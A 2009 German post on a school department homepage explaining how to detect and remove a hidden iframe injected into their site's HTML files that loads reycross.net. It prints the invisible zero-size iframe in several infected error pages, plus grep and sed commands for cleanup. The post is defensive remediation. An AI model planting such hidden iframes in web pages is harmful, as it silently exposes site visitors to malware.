Abteilungshomepage Neu


Unsere HP infiziert mit reycross.net

17.10.2009

http://orangebud.net/2009/07/22/infizierte-website-mit-reycross-net/



Zunächst einmal sollte man checken ob die eigenen Seiten infiziert sind. Das merkt man indem man folgendes im Quellcode ganz am Ende findet:

</html><iframe src="http://reycross.net/lib/index.php...

Mit folgendem Grep Aufruf kann man seinen Ordner rekursiv nach dieser Erweiterung durchsuchen:

grep -R "http://reycross.net/lib/index.php" *

Sollte grep etwas finden, sieht dies so aus:

error/authorizationRequired.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/fileNotFound.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/forbidden.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/internalServerError.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/invalidSyntax.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Um das Ganze zu beheben verwenden wir ebenfalls ein BASH Script: (Vorsicht, der aktuelle Ordner wird rekursiv durchsucht und der Dateiinhalt ersetzt, schaut euch das Script genau an bevor ihr es aufruft, für Fehler hafte ich nicht)

sed -i 's/<iframe src="http:\/\/reycross.net\/lib\/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' `find . -name \*.htm`

Dieses Skript löscht unseren Übeltäter aus allen .htm Dateien. Diese Erweiterung muss für verschiedene Dateitypen natürlich angepasst werden.
Ein Test mit dem vorherigen Grep Befehl gibt Aufschluss ob alles erwischt wurde. Bleibt dem Opfer nur noch die weit zeitaufwendigere Arbeit der Fehlersuche.




Title: Lokale Installation von htl.moedling.at		

Author: Kner	

Date: 2010

Comment: Installationsskripts